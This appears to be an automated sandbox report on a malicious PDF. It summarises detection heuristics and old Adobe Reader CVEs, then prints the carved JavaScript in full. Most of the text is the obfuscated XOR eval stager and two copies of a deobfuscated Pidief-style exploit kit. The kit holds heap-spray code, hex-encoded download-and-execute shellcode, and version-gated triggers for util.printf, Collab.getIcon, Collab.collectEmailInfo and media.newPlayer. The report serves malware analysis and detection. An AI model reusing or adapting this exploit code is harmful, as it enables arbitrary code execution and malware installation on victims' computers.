MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF contains embedded JavaScript, identified by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_PAGE_WORD_XOR_EVAL_STAGER rule indicates that this JavaScript is obfuscated and likely acts as a stager. The extracted artifact 'javascript_obj0011_000.js' further confirms the presence of JavaScript. The primary function of this script appears to be downloading and executing a second-stage payload, though the exact URL is obfuscated within the script.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGERPDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ahrudl.egh/4 Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.js |
pdf-javascript-stream | PDF /JS object 11 at offset 0xE5E | 532 bytes |
SHA-256: 7f6c623fe61da1c591304a6e1aef95026f116fba93622f534d496d6cf05e5b85 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
try {var chWord, numWords;for (var i = 0; i < this.numPages; i++){}wP='var !!xG!L = 7!!8 ;var fMN =! t!his;va!r xW=fMN.g!e!!tP!ageNumWords(t!!his.pageNu!m);var gL=\'\';for(va!!r bK=0;bK< xW; bK++){!!gL=[g!!L,fMN.getPageNthWord(f!MN!.!!pageNum,b!!K,tr!ue!)].!!join(\'\');;}v!a!!r!! cBG!=\'\';for(var !b!!K=0;!bK < g!L.length; !bK+=2){!!zKZ!!=gL.substr(bK,2);cB!!G=[cBG,St!!ring.fromChar!!Co!de(parseInt!!(zK!!Z,16)^xGL)].!j!!oin(!\'\');}eva!l(cBG);cBG=n!ull;'.replace(/[\!]/g, '');dA=qN();} catch(pAD){var tM=new Function (wP);tM();}
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3760 bytes |
SHA-256: e2bd433307bfe0027e397daceaad30ae11df957d6acdbbf33db699065bd09e55 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
d=["cV","h","p"];hI={};var sV='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';for(var f=0; f <944; f++){var cB='tE'};l=[];for(var yX=0; yX <884; yX++){var v='z'};var j=this.info['mT'].replace(/[\s]/g, '');this.iR=23286;this.iR-=204;this.fO=5693;this.fO-=11;var zK = this.info;var iV = (zK.producer.substr(0,5) == 'debug');var tCR = new Array(); var bI = "%u";function yN(str){str = str.split(bI);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function bC(str1, str2){return [str1, str2].join("");}function yVI(mTQ){var cR = pQ();var sVS = mTE();cR += ((cR.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + sVS;if(iV) app.alert("URL: " + cR);cR=yZ(cR);var d=bI;var zKZ=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";zKZ+=cR;return yN(zKZ);};function pQ(){var lG = (zK.author + zK.title).replace(/[\s]/g, '');var qH = n(lG, j, sV);return qH;};function n(lG, sV, j){var qH="";for(var i=0; i < lG.length; i++){var vE = sV.indexOf(lG[i]);if(vE > -1 ){qH += j[vE];}}return qH;};function yZ(lG){var out = "";lG = uR(lG);g = Math.round(lG.length / 4);if (g != lG.length /4) lG+="00";for(var i=0; i < lG.length; i+=4){out+= bI + lG.substr(i+2, 2) + lG.substr(i, 2);}return out;};function uR(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function hE(iH, len){while (iH.length * 2 < len){iH = bC(iH, iH);}return iH.substring(0, len / 2);};function bIX(nQ){var aJ = 0x0c0c0c0c; xG = yVI("pdf");if (nQ == 1){aJ = 0x30303030;}var iJ = 0x400000;var ln = xG.length * 2;var nS = iJ - (ln + 0x38);var iH = yN(bI+"9090"+bI+"9090"); iH = hE(iH, nS);var oB = (aJ - 0x400000) / iJ;for (var lK = 0; lK < oB; lK ++ ){tCR[lK] = bC(iH, xG);}};function mTE(){try {return app.viewerVersion.toString();}catch(eL){ return 0;}}if(iV) app.alert("called exploit");var sVS = mTE();if(iV) app.alert("v: " + sVS);if (sVS > 8){if(iV) app.alert("util.printf");bIX(1);var jG = "12999999999999999999";for (iJM=0; iJM < 276; iJM++) jG += "8";util.printf("%45000f", jG);}if (sVS < 8){if(iV) app.alert("Collab.collectEmailInfo");bIX(0);var wD = yN(bI+"0c0c"+bI+"0c0c");while (wD.length < 44952) wD += wD;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : wD});}if (sVS < 9.1){if (app.doc.Collab.getIcon){if(iV) app.alert("Collab.getIcon");bIX(0);var pQF = unescape("%09");while (pQF.length < 0x4000) pQF += pQF;pQF = "N." + pQF;app.doc.Collab.getIcon(pQF);}}if (sVS == 9.2){if(iV) app.alert("media.newPlayer");bIX(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}fM=24033;fM++;kL=12098;kL+=120;r={pC:"oL"};�ER��
|
|||
page_word_xor_stage_000.js |
deobfuscated-js | page-word continuous-hex XOR decoded JavaScript (decompressed, key=0x4E) at offset 0x8C | 3755 bytes |
SHA-256: 408a8bc404d0e46bf3fc4bb6a2159ba08485e3cbd216f42e2e3a86acd7e34456 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
d=["cV","h","p"];hI={};var sV='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';for(var f=0; f <944; f++){var cB='tE'};l=[];for(var yX=0; yX <884; yX++){var v='z'};var j=this.info['mT'].replace(/[\s]/g, '');this.iR=23286;this.iR-=204;this.fO=5693;this.fO-=11;var zK = this.info;var iV = (zK.producer.substr(0,5) == 'debug');var tCR = new Array(); var bI = "%u";function yN(str){str = str.split(bI);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function bC(str1, str2){return [str1, str2].join("");}function yVI(mTQ){var cR = pQ();var sVS = mTE();cR += ((cR.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + sVS;if(iV) app.alert("URL: " + cR);cR=yZ(cR);var d=bI;var zKZ=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";zKZ+=cR;return yN(zKZ);};function pQ(){var lG = (zK.author + zK.title).replace(/[\s]/g, '');var qH = n(lG, j, sV);return qH;};function n(lG, sV, j){var qH="";for(var i=0; i < lG.length; i++){var vE = sV.indexOf(lG[i]);if(vE > -1 ){qH += j[vE];}}return qH;};function yZ(lG){var out = "";lG = uR(lG);g = Math.round(lG.length / 4);if (g != lG.length /4) lG+="00";for(var i=0; i < lG.length; i+=4){out+= bI + lG.substr(i+2, 2) + lG.substr(i, 2);}return out;};function uR(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function hE(iH, len){while (iH.length * 2 < len){iH = bC(iH, iH);}return iH.substring(0, len / 2);};function bIX(nQ){var aJ = 0x0c0c0c0c; xG = yVI("pdf");if (nQ == 1){aJ = 0x30303030;}var iJ = 0x400000;var ln = xG.length * 2;var nS = iJ - (ln + 0x38);var iH = yN(bI+"9090"+bI+"9090"); iH = hE(iH, nS);var oB = (aJ - 0x400000) / iJ;for (var lK = 0; lK < oB; lK ++ ){tCR[lK] = bC(iH, xG);}};function mTE(){try {return app.viewerVersion.toString();}catch(eL){ return 0;}}if(iV) app.alert("called exploit");var sVS = mTE();if(iV) app.alert("v: " + sVS);if (sVS > 8){if(iV) app.alert("util.printf");bIX(1);var jG = "12999999999999999999";for (iJM=0; iJM < 276; iJM++) jG += "8";util.printf("%45000f", jG);}if (sVS < 8){if(iV) app.alert("Collab.collectEmailInfo");bIX(0);var wD = yN(bI+"0c0c"+bI+"0c0c");while (wD.length < 44952) wD += wD;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : wD});}if (sVS < 9.1){if (app.doc.Collab.getIcon){if(iV) app.alert("Collab.getIcon");bIX(0);var pQF = unescape("%09");while (pQF.length < 0x4000) pQF += pQF;pQF = "N." + pQF;app.doc.Collab.getIcon(pQF);}}if (sVS == 9.2){if(iV) app.alert("media.newPlayer");bIX(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}fM=24033;fM++;kL=12098;kL+=120;r={pC:"oL"};
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.